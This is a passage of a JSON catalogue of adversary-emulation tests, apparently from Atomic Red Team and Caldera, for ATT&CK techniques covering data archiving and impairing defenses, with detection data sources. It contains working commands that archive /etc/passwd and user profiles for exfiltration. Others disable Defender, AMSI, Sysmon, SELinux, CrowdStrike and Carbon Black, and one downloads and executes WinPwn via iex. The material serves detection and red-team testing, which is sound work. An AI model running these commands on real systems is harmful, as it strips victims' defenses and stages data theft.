\"import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('/tmp/passwd.bz2','w+');output_file.write(bz2content);output_file.close();\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.zip', mode='w').write('#{path_to_input_file}')\"\n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('/etc/passwd')\" \n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + }, + { + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('/tmp/passwd.tar.gz', mode='w').write('#{path_to_input_file}')\" \n", + "source": "atomics/T1560.002/T1560.002.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Library" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1560.002", + "display_name": "Archive Collected Data: Archive via Library", + "atomic_tests": [ + { + "name": "Compressing data using GZip in Python (Linux)", + "auto_generated_guid": "391f5298-b12d-4636-8482-35d9c17d53a8", + "description": "Uses GZip from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": 
"/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .gz file to be", + "type": "Path", + "default": "/tmp/passwd.gz" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"import gzip;input_file=open('#{path_to_input_file}', 'rb');content=input_file.read();input_file.close();output_file=gzip.GzipFile('#{path_to_output_file}','wb','compresslevel=6');output_file.write(content);output_file.close();\"\n", + "cleanup_command": "rm #{path_to_output_file}\n" + } + }, + { + "name": "Compressing data using bz2 in Python (Linux)", + "auto_generated_guid": "c75612b2-9de0-4d7c-879c-10d7b077072d", + "description": "Uses bz2 from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": "/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .bz2 file to be", + "type": "Path", + "default": "/tmp/passwd.bz2" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"import bz2;input_file=open('#{path_to_input_file}','rb');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open('#{path_to_output_file}','w+');output_file.write(bz2content);output_file.close();\"\n", + "cleanup_command": "rm #{path_to_output_file}\n" + } + }, + { + "name": "Compressing data using zipfile in Python 
(Linux)", + "auto_generated_guid": "001a042b-859f-44d9-bf81-fd1c4e2200b0", + "description": "Uses zipfile from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": "/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .zip file to be", + "type": "Path", + "default": "/tmp/passwd.zip" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"\n", + "cleanup_command": "rm #{path_to_output_file}\n" + } + }, + { + "name": "Compressing data using tarfile in Python (Linux)", + "auto_generated_guid": "e86f1b4b-fcc1-4a2a-ae10-b49da01458db", + "description": "Uses tarfile from Python to compress files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_input_file": { + "description": "Path to the file that you want to compress", + "type": "Path", + "default": "/etc/passwd" + }, + "path_to_output_file": { + "description": "Path of the file that you want your .tar.gz file to be", + "type": "Path", + "default": "/tmp/passwd.tar.gz" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires Python\n", + "prereq_command": "which_python=`which python`; $which_python -V\n", + "get_prereq_command": "" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "$which_python -c \"from zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\" \n", + "cleanup_command": "rm 
#{path_to_output_file}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1560", + "command_list": [ + "dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath #{output_file}\n", + "dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\\T1560-data-ps.zip\n" + ], + "commands": [ + { + "command": "dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath #{output_file}\n", + "source": "atomics/T1560/T1560.yaml", + "name": "Atomic Red Team Test - Archive Collected Data" + }, + { + "command": "dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\\T1560-data-ps.zip\n", + "source": "atomics/T1560/T1560.yaml", + "name": "Atomic Red Team Test - Archive Collected Data" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1560", + "display_name": "Archive Collected Data", + "atomic_tests": [ + { + "name": "Compress Data for Exfiltration With PowerShell", + "auto_generated_guid": "41410c60-614d-4b9d-b66e-b0192dd9c597", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.\nWhen the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path that should be compressed into our output file", + "type": "Path", + "default": "$env:USERPROFILE" + }, + "output_file": { + "description": "Path where resulting compressed data should be placed", + "type": "Path", + "default": "$env:USERPROFILE\\T1560-data-ps.zip" + } + }, + "executor": { + "name": "powershell", + "elevation_required": 
false, + "command": "dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}\n", + "cleanup_command": "Remove-Item -path #{output_file} -ErrorAction Ignore" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface 
and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + 
"data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1562.001", + "command_list": [ + "#{flavor_command}\n", + "systemctl stop rsyslog ; systemctl disable rsyslog\n", + "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", + "setenforce 0\n", + "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", + "sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "sudo spctl --master-disable\n", + "sudo launchctl unload 
/Library/LaunchDaemons/com.crowdstrike.falcond.plist\nsudo launchctl unload #{userdaemon_plist}\n", + "sudo launchctl unload #{falcond_plist}\nsudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist\n", + "fltmc.exe unload SysmonDrv\n", + "sysmon -u\n", + "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n", + "Remove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n", + "net.exe stop McAfeeDLPAgentService\nsc.exe config McAfeeDLPAgentService start= disabled\n", + "Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n", + "sc stop WinDefend\nsc config WinDefend start=disabled\nsc query WinDefend\n", + "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1\n", + "New-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableInternetFilesInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableUnsafeLocationsInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableAttachementsInPV\" -Value \"1\" -PropertyType \"Dword\"\n", + "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" 
-RemoveDefinitions -All\n", + "Stop-Service -Name McAfeeDLPAgentService\nRemove-Service -Name McAfeeDLPAgentService\n", + "if (Test-Path \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\") {. \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\" /repair /uninstall /quiet } else { Get-ChildItem -Path \"C:\\ProgramData\\Package Cache\" -Include \"WindowsSensor.exe\" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq \"Valid\" -and $sig.SignerCertificate.DnsNameList -eq \"CrowdStrike, Inc.\") { . \"$_\" /repair /uninstall /quiet; break;}}}", + "$excludedpath= \"C:\\Temp\"\nAdd-MpPreference -ExclusionPath $excludedpath", + "$excludedExts= \".exe\"\nAdd-MpPreference -ExclusionExtension $excludedExts", + "$excludedProcess = \"outlook.exe\"\nAdd-MpPreference -ExclusionProcess $excludedProcess", + null, + "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "cmd /c #{DefenderControlExe} /D FFFF | Out-Null\n", + "cmd /c $env:temp\\DefenderControl\\DefenderControl\\DefenderControl.exe /D #{DefenderID} | Out-Null\n", + "Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "& $env:temp\\Backstab64.exe -k -n MsMpEng.exe", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive ", + "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")", + "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", + "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n" + ], + "commands": [ + { + "command": "#{flavor_command}\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "systemctl stop rsyslog ; systemctl disable rsyslog\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "setenforce 0\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: 
Disable or Modify Tools" + }, + { + "command": "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo spctl --master-disable\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.falcond.plist\nsudo launchctl unload #{userdaemon_plist}\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sudo launchctl unload #{falcond_plist}\nsudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "fltmc.exe unload SysmonDrv\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sysmon -u\n", + "source": 
"atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Remove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "net.exe stop McAfeeDLPAgentService\nsc.exe config McAfeeDLPAgentService start= disabled\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "sc stop WinDefend\nsc config WinDefend start=disabled\nsc query WinDefend\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "New-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\"\nNew-ItemProperty 
-Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableInternetFilesInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableUnsafeLocationsInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableAttachementsInPV\" -Value \"1\" -PropertyType \"Dword\"\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Stop-Service -Name McAfeeDLPAgentService\nRemove-Service -Name McAfeeDLPAgentService\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "if (Test-Path \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\") {. \"C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe\" /repair /uninstall /quiet } else { Get-ChildItem -Path \"C:\\ProgramData\\Package Cache\" -Include \"WindowsSensor.exe\" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq \"Valid\" -and $sig.SignerCertificate.DnsNameList -eq \"CrowdStrike, Inc.\") { . 
\"$_\" /repair /uninstall /quiet; break;}}}", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "$excludedpath= \"C:\\Temp\"\nAdd-MpPreference -ExclusionPath $excludedpath", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "$excludedExts= \".exe\"\nAdd-MpPreference -ExclusionExtension $excludedExts", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "$excludedProcess = \"outlook.exe\"\nAdd-MpPreference -ExclusionProcess $excludedProcess", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": null, + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "cmd /c #{DefenderControlExe} /D FFFF | Out-Null\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "cmd /c $env:temp\\DefenderControl\\DefenderControl\\DefenderControl.exe /D #{DefenderID} | Out-Null\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows 
Defender\" -Recurse\n Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "& $env:temp\\Backstab64.exe -k -n MsMpEng.exe", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive ", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")", + "source": "data/abilities/defense-evasion/3864fd22-5c63-41c9-bdbc-a66b5ffa3f5e.yml", + "name": "Ensure the ExecutionPolicy is turned to Bypass" + }, + { + "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", + "source": "data/abilities/defense-evasion/49470433-30ce-4714-a44b-bea9dbbeca9a.yml", + "name": "Disable Windows Defender Real-Time Protection" + }, + { + "command": "Set-MpPreference -DisableIntrusionPreventionSystem 
